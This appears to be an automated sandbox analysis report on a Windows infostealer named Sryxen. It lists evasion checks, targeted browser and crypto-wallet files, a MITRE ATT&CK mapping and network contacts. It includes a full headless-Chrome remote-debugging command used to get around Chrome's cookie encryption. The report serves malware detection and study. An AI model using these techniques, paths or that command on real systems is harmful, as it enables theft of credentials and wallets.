Source: C:\Users\user\Desktop\Sryxen-Built.exeCode function: 0_2_00007FF67B6E8A8C GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,CloseHandle,CloseHandle,0_2_00007FF67B6E8A8C
Source: C:\Users\user\Desktop\Sryxen-Built.exeCode function: 0_2_00007FF67B6E89AC FindClose,FindFirstFileExW,GetLastError,0_2_00007FF67B6E89AC
Source: C:\Users\user\Desktop\Sryxen-Built.exeCode function: 0_2_00007FF67B6A85D0 GetSystemInfo,0_2_00007FF67B6A85D0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: Amcache.hve.25.drBinary or memory string: VMware
Source: Amcache.hve.25.drBinary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.25.drBinary or memory string: vmci.syshbin
Source: Amcache.hve.25.drBinary or memory string: VMware, Inc.
Source: Amcache.hve.25.drBinary or memory string: VMware20,1hbin@
Source: Sryxen-Built.exe, 00000000.00000003.1307303927.0000018D46250000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1307947942.0000018D46250000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000002.1489431988.0000018D46250000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
Source: Amcache.hve.25.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.25.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.25.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Sryxen-Built.exe, 00000000.00000002.1489919638.0000018D463A0000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000002.1489919638.0000018D463B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: Amcache.hve.25.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.25.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.25.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.25.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: curl.exe, 00000013.00000002.1391486810.00000235E6898000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.25.drBinary or memory string: vmci.sys
Source: Amcache.hve.25.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.25.drBinary or memory string: vmci.syshbin`
Source: Amcache.hve.25.drBinary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.25.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.25.drBinary or memory string: VMware20,1
Source: Sryxen-Built.exe, 00000000.00000003.1244567666.0000018D46266000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1251610490.0000018D46264000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1243001901.0000018D4625D000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1250357192.0000018D46263000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1247609444.0000018D46259000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1242868327.0000018D4625D000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1250254001.0000018D46259000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1248469152.0000018D46266000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1243665893.0000018D46265000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1255418871.0000018D46264000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlle\22
Source: Amcache.hve.25.drBinary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.25.drBinary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.25.drBinary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.25.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.25.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.25.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.25.drBinary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.25.drBinary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.25.drBinary or memory string: VMware Virtual RAM
Source: Amcache.hve.25.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.25.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\Sryxen-Built.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\Sryxen-Built.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\Sryxen-Built.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\Sryxen-Built.exeCode function: 0_2_00007FF67B527E50 IsDebuggerPresent,0_2_00007FF67B527E50
Source: C:\Users\user\Desktop\Sryxen-Built.exeCode function: 0_2_00007FF67B534870 LoadLibraryW,GetProcAddress,NtQueryInformationProcess,ReadProcessMemory,0_2_00007FF67B534870
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Users\user\Desktop\Sryxen-Built.exeCode function: 0_2_00007FF67B6EF5B0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF67B6EF5B0

HIPS / PFW / Operating System Protection Evasion

barindex
Found direct / indirect Syscall (likely to bypass EDR)
Source: C:\Users\user\Desktop\Sryxen-Built.exeNtQueryInformationProcess: Indirect: 0x7FF67B53491AJump to behavior
Maps a DLL or memory area into another process
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeSection loaded: NULL target: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe protection: readonlyJump to behavior
Source: C:\Users\user\Desktop\Sryxen-Built.exeCode function: GetLocaleInfoEx,FormatMessageA,0_2_00007FF67B6E6FA0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\Desktop\Sryxen-Built.exeCode function: 0_2_00007FF67B6EA048 GetSystemTimePreciseAsFileTime,GetSystemTimeAsFileTime,0_2_00007FF67B6EA048
Source: C:\Users\user\Desktop\Sryxen-Built.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: Amcache.hve.25.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.25.drBinary or memory string: msmpeng.exe
Source: Amcache.hve.25.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.25.drBinary or memory string: MsMpEng.exe

Stealing of Sensitive Information

barindex
Found many strings related to Crypto-Wallets (likely being stolen)
Source: Sryxen-Built.exe, 00000000.00000003.1255440690.0000018D46202000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: Sryxen-Built.exe, 00000000.00000003.1255440690.0000018D46202000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxx Liberty
Source: Sryxen-Built.exe, 00000000.00000002.1489431988.0000018D461F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: Sryxen-Built.exe, 00000000.00000002.1489431988.0000018D461F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum\keystore
Source: Sryxen-Built.exe, 00000000.00000003.1255440690.0000018D46202000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3
Source: Sryxen-Built.exe, 00000000.00000002.1489431988.0000018D461F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum\keystore
Source: Sryxen-Built.exe, 00000000.00000002.1489431988.0000018D461F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: Sryxen-Built.exe, 00000000.00000002.1489431988.0000018D461F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum\keystore
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\Sryxen-Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
Source: C:\Users\user\Desktop\Sryxen-Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
Source: C:\Users\user\Desktop\Sryxen-Built.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
Source: C:\Users\user\Desktop\Sryxen-Built.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
Source: C:\Users\user\Desktop\Sryxen-Built.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
Source: C:\Users\user\Desktop\Sryxen-Built.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
Source: C:\Users\user\Desktop\Sryxen-Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior

Remote Access Functionality

barindex
Attempt to bypass Chrome Application-Bound Encryption
Source: C:\Users\user\Desktop\Sryxen-Built.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --remote-debugging-port=21026 --remote-allow-origins=* --disable-extensions --no-sandbox --disable-gpu

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Native API		1
Registry Run Keys / Startup Folder		11
Process Injection		1
Masquerading		1
OS Credential Dumping		1
System Time Discovery		Remote Services1
Archive Collected Data		21
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
DLL Side-Loading		1
Abuse Elevation Control Mechanism		31
Virtualization/Sandbox Evasion		LSASS Memory31
Security Software Discovery		Remote Desktop Protocol2
Data from Local System		1
Remote Access Software		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
Registry Run Keys / Startup Folder		11
Process Injection		Security Account Manager31
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive2
Ingress Tool Transfer		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
DLL Side-Loading		1
Deobfuscate/Decode Files or Information		NTDS2
Process Discovery		Distributed Component Object ModelInput Capture3
Non-Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
Extra Window Memory Injection		1
Abuse Elevation Control Mechanism		LSA Secrets1
Application Window Discovery		SSHKeylogging4
Application Layer Protocol		Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Obfuscated Files or Information		Cached Domain Credentials1
File and Directory Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
DLL Side-Loading		DCSync24
System Information Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
Extra Window Memory Injection		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1632714 Sample: Sryxen-Built.exe Startdate: 09/03/2025 Architecture: WINDOWS Score: 84 68 AI detected suspicious PE digital signature 2->68 70 Joe Sandbox ML detected suspicious sample 2->70 72 Sigma detected: Potential Data Stealing Via Chromium Headless Debugging 2->72 74 Sigma detected: Suspicious Script Execution From Temp Folder 2->74 7 Sryxen-Built.exe 43 2->7         started        11 msedge.exe 71 754 2->11         started        14 msedge.exe 2->14         started        16 msedge.exe 2->16         started        process3 dnsIp4 54 127.0.0.1 unknown unknown 7->54 78 Attempt to bypass Chrome Application-Bound Encryption 7->78 80 Found many strings related to Crypto-Wallets (likely being stolen) 7->80 82 Tries to harvest and steal browser information (history, passwords, etc) 7->82 84 Found direct / indirect Syscall (likely to bypass EDR) 7->84 18 powershell.exe 7->18         started        22 chrome.exe 1 7->22         started        24 msedge.exe 16 7->24         started        35 3 other processes 7->35 56 192.168.2.4, 138, 443, 49708 unknown unknown 11->56 58 239.255.255.250 unknown Reserved 11->58 50 C:\Users\user\AppData\Local\...\Login Data, SQLite 11->50 dropped 52 C:\Users\user\AppData\Local\...\History, SQLite 11->52 dropped 86 Maps a DLL or memory area into another process 11->86 26 msedge.exe 11->26         started        29 msedge.exe 11->29         started        37 4 other processes 11->37 31 msedge.exe 14->31         started        33 msedge.exe 16->33         started        file5 signatures6 process7 dnsIp8 48 C:\Users\user\...\user_SryxenRetrieved.zip, Zip 18->48 dropped 76 Loading BitLocker PowerShell Module 18->76 39 conhost.exe 18->39         started        41 chrome.exe 22->41         started        44 msedge.exe 24->44         started        62 a-0003.a-msedge.net 204.79.197.203, 443, 49741, 49759 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 26->62 64 204.79.197.219, 443, 49826, 49827 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 26->64 66 19 other IPs or domains 26->66 46 conhost.exe 35->46         started        file9 signatures10 process11 dnsIp12 60 www.google.com 172.217.16.196, 443, 49727, 49728 GOOGLEUS United States 41->60

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Sryxen-Built.exe6%VirustotalBrowse
Sryxen-Built.exe8%ReversingLabs

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://msn.comXIDv100%Avira URL Cloudsafe
https://drive-daily-1.corp.google.com/0%Avira URL Cloudsafe
https://drive-daily-4.corp.google.com/0%Avira URL Cloudsafe
https://drive-staging.corp.google.com/0%Avira URL Cloudsafe
https://drive-daily-2.corp.google.com/0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
mira-tmc.tm-4.office.com
52.123.243.195
truefalse
    		high
    chrome.cloudflare-dns.com
    		172.64.41.3
    		truefalse
      		high
      a416.dscd.akamai.net
      		2.22.242.11
      		truefalse
        		high
        a-0003.a-msedge.net
        		204.79.197.203
        		truefalse
          		high
          www.google.com
          		172.217.16.196
          		truefalse
            		high
            googlehosted.l.googleusercontent.com
            		142.250.185.97
            		truefalse
              		high
              clients2.googleusercontent.com
              		unknown
              		unknownfalse
                		high
                bzib.nelreports.net
                		unknown
                		unknownfalse
                  		high
                  ntp.msn.com
                  		unknown
                  		unknownfalse
                    		high

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://c.msn.com/c.gif?rnd=1741477429202&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=a8317c49e1884f1e947b8f0bc3e99881&activityId=a8317c49e1884f1e947b8f0bc3e99881&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=3D7D56B0A2034413818A5FEF887FCACF&MUID=0815C547F66A6ADB3C0FD0EEF7EC6BB9false
                      		high
                      https://assets.msn.com/bundles/v1/edgeChromium/latest/common.a1e626d952b002612af0.jsfalse
                        		high
